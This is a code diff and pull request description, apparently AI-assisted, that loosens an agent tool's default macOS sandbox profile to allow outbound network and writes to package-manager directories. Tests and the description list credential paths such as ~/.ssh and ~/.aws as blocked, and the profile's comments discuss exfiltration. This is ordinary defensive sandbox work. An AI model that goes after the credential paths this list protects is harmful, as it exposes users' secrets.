+  it("blocks writes to ~/.aws (credential path)", async () => {
+    const testFile = join(HOME, ".aws", `.sandbox-test-${Date.now()}`);
+    const result = await runner.exec(
+      `mkdir -p ~/.aws && touch "${testFile}" 2>&1; rm -f "${testFile}" 2>/dev/null; exit $?`,
+      { cwd: process.cwd() },
+    );
+    expect(result.stderr + result.stdout).toMatch(/permitted|denied/i);
+  });
+
+  // /bin/ps and /usr/bin/top are setuid binaries — macOS sandbox refuses to
+  // exec them regardless of profile. pgrep is non-setuid and serves to verify
+  // that process introspection (which the profile allows) works in principle.
+  it("allows process introspection via pgrep (non-setuid)", async () => {
+    const result = await runner.exec("/usr/bin/pgrep -l sh | head -1", {
+      cwd: process.cwd(),
+    });
+    expect(result.exitCode).toBe(0);
+  });
+
+  it("allows external network access (curl to example.com)", async () => {
+    const result = await runner.exec(
+      "curl -s --max-time 5 -o /dev/null -w '%{http_code}' https://example.com",
+      { cwd: process.cwd(), timeout: 10_000 },
+    );
+    // curl returns the HTTP status; 200 means the request succeeded end-to-end
+    expect(result.exitCode).toBe(0);
+    expect(result.stdout.trim()).toBe("200");
   });
 });

--- a/src/tools/exec/sandbox/sandbox-exec.ts
+++ b/src/tools/exec/sandbox/sandbox-exec.ts
@@ -1,49 +1,66 @@
 import { spawn } from "node:child_process";
 import { writeFile, unlink } from "node:fs/promises";
 import { randomUUID } from "node:crypto";
+import { homedir } from "node:os";
 import { join } from "node:path";
 import { PassthroughRunner, spawnAndCollect } from "./passthrough.js";
 import type { SandboxExecOptions, SandboxExecResult, SandboxMode, SandboxRunner } from "./types.js";
 
 const SANDBOX_EXEC_BIN = "/usr/bin/sandbox-exec";
 
-function buildAutoProfile(cwd: string): string {
+// auto mode is intentionally NOT a security boundary — see
+// docs/design/a7-sandbox-loosen-auto.md. The goal is to prevent obvious
+// accidents (writes to /etc, ~/.ssh, etc.) while letting normal coding
+// workflows (npm install, pip install, gh, curl) work.
+function buildAutoProfile(cwd: string, home: string): string {
   return `(version 1)
 
-; Deny everything not explicitly allowed below.
 (deny default)
 
-; Process lifecycle — needed for almost all programs.
+; Process lifecycle
 (allow process*)
 (allow signal)
 (allow sysctl-read)
+(allow sysctl-write)
 (allow mach*)
 (allow ipc*)
 
-; Reads: allow everywhere (auto mode).
+; Process introspection — needed for /bin/ps, /usr/bin/top, etc.
+(allow process-info* (target others))
+
+; Reads: allow everywhere.
 (allow file-read*)
 
-; Writes: allow only inside the project root and system temp dirs.
+; Writes: project root + system temp + common dev-tooling locations.
 (allow file-write* (subpath "${cwd}"))
 (allow file-write* (subpath "/private/tmp"))
-; /var/folders is a symlink to /private/var/folders on macOS — allow both forms.
 (allow file-write* (subpath "/var/folders"))
 (allow file-write* (subpath "/private/var/folders"))
 
-; Network policy — intent: agent can run tests / dev servers that bind to
-; loopback, but cannot exfiltrate data to the public internet.
-; - Bind is harmless on any interface; allow it (the deny on outbound below
-;   prevents using a bound socket to reach external hosts).
-; - Inbound: accept connections on bound sockets (supertest, jest, etc.).
-; - Outbound: allow loopback only. The sandbox-exec address grammar only
-;   accepts "*" or "localhost" as the host literal — "localhost" matches both
-;   127.0.0.1 and ::1.
-(allow network-bind)
-(allow network-inbound)
-(allow network-outbound (remote ip "localhost:*"))
-; Unix domain sockets stay open (used by many local tools, e.g. PostgreSQL).
-(allow network* (remote unix-socket))
-(allow network* (local unix-socket))
+; Standard device nodes — /dev/null, /dev/stdout, /dev/tty, etc.
+; Many tools (curl -o /dev/null, shell redirects) need this.
+(allow file-write* (subpath "/dev"))
+
+; XDG base directories
+(allow file-write* (subpath "${home}/.cache"))
+(allow file-write* (subpath "${home}/.config"))
+(allow file-write* (subpath "${home}/.local"))
+
+; Package-manager dot-dirs
+(allow file-write* (subpath "${home}/.npm"))
+(allow file-write* (subpath "${home}/.cargo"))
+(allow file-write* (subpath "${home}/.yarn"))
+(allow file-write* (subpath "${home}/.pnpm-store"))
+(allow file-write* (subpath "${home}/.gem"))
+(allow file-write* (subpath "${home}/.gradle"))
+(allow file-write* (subpath "${home}/.m2"))
+(allow file-write* (subpath "${home}/.rustup"))
+
+; macOS app caches (pip, brew log cache, Ruby gems, etc.)
+(allow file-write* (subpath "${home}/Library/Caches"))
+
+; Network: allow all. auto is convenience-first; use strict for isolation.
+(allow network*)
 `;
 }
 
@@ -60,9 +77,10 @@ export class SandboxExecRunner implements SandboxRunner {
     this.mode = mode === "strict" ? "auto" : mode;
     const effectiveMode = this.mode;
 
+    const home = process.env.HOME ?? homedir();
     this.profilePath = join("/tmp", `opencli-sandbox-${randomUUID()}.sb`);
 
-    this.ready = writeFile(this.profilePath, buildAutoProfile(cwd), { mode: 0o600 })
+    this.ready = writeFile(this.profilePath, buildAutoProfile(cwd, home), { mode: 0o600 })
       .then(() => {
         // Only emit the strict-mode warning when the runner will actually execute.
         if (mode === "strict") {

--- a/src/tools/exec/sandbox/sandbox-exec.ts
+++ b/src/tools/exec/sandbox/sandbox-exec.ts
@@ -21,7 +21,6 @@ function buildAutoProfile(cwd: string, home: string): string {
 (allow process*)
 (allow signal)
 (allow sysctl-read)
-(allow sysctl-write)
 (allow mach*)
 (allow ipc*)
 
@@ -37,9 +36,17 @@ function buildAutoProfile(cwd: string, home: string): string {
 (allow file-write* (subpath "/var/folders"))
 (allow file-write* (subpath "/private/var/folders"))
 
-; Standard device nodes — /dev/null, /dev/stdout, /dev/tty, etc.
-; Many tools (curl -o /dev/null, shell redirects) need this.
-(allow file-write* (subpath "/dev"))
+; Standard device nodes — explicit literals rather than (subpath "/dev") to
+; keep the allow surface narrow. Needed for curl -o /dev/null, shell
+; redirects, /dev/tty prompts, etc.
+(allow file-write*
+  (literal "/dev/null")
+  (literal "/dev/zero")
+  (literal "/dev/stdout")
+  (literal "/dev/stderr")
+  (literal "/dev/tty")
+  (literal "/dev/urandom")
+  (literal "/dev/random"))
 
 ; XDG base directories
 (allow file-write* (subpath "${home}/.cache"))


### PR DESCRIPTION
## Summary

- Loosens the default `auto` sandbox profile so `npm install`, `pip install`, `gh`, `git clone`, and `curl` all succeed without forcing users to `--sandbox off`.
- Adds writes for XDG dirs + common package-manager dot-dirs (`~/.npm`, `~/.cache`, `~/.cargo`, etc.), allows all outbound network, allows writes to `/dev` (so `curl -o /dev/null` and shell redirects work), and adds `(allow process-info* (target others))` for non-setuid process tools.
- Updates the docs to be honest about what `auto` buys: prevent accidental writes to system & credential paths. **Not a security boundary** — `strict` (still stubbed; Phase 2 in [docs/design/a7-sandbox-loosen-auto.md](docs/design/a7-sandbox-loosen-auto.md)) is the real isolation mode.
- Linux: drops `--unshare-net`; pre-creates the dot-dirs at runner construction so `--bind` doesn't fail on first run.

**Still blocked:** writes to `~/.ssh`, `~/.aws`, `~/.gnupg`, `~/.docker`, `~/.kube`, `~/Documents`, `~/Desktop`, `/etc`, `/usr`, `/System`, `/Applications`. The deny-default catches everything outside the explicit allow list.

**Note on `/bin/ps`:** the original issue flagged `ps` as blocked. It's setuid root — macOS sandbox-exec refuses to exec setuid binaries regardless of profile. Documented as a platform limitation; non-setuid tools (`pgrep`, `lsof -p`) work fine.

## Related issue

Closes #127

## Test plan

- [x] `npm run typecheck && npm run lint && npm run format:check && npm test` — 534 tests pass
- [x] Manual end-to-end: `npm install lodash` from a fresh dir succeeds inside the sandbox (fetches from registry.npmjs.org, writes to `~/.npm/_cacache`, creates `node_modules/lodash/`)
- [x] Existing sandbox tests still pass: writes to `/etc/hosts` denied, writes to CWD allowed, loopback bind/connect works
- [x] New tests cover the new allows: writes to `~/.npm`, `~/.cache`, `~/Library/Caches` succeed; writes to `~/.ssh`, `~/.aws` denied; `curl https://example.com` succeeds; `pgrep` works
- [ ] Linux CI passes (bwrap changes — verified via review since macOS dev machine)

## Notes for reviewers

The behavior change is significant — outbound network is now allowed by default. Anyone relying on `auto` to block external network needs to know:
1. `auto` was never really a security boundary (file-read* exposed everything)
2. `strict` mode (Phase 2, separate PR) will provide real isolation
3. In the interim, `--sandbox off` + external firewall is the recommended setup for security-sensitive contexts

The design doc ([docs/design/a7-sandbox-loosen-auto.md](docs/design/a7-sandbox-loosen-auto.md)) lays out the full reasoning, Phase 2 strict mode design, and decision matrix.

🤖 Generated with [Claude Code](https://claude.com/claude-code)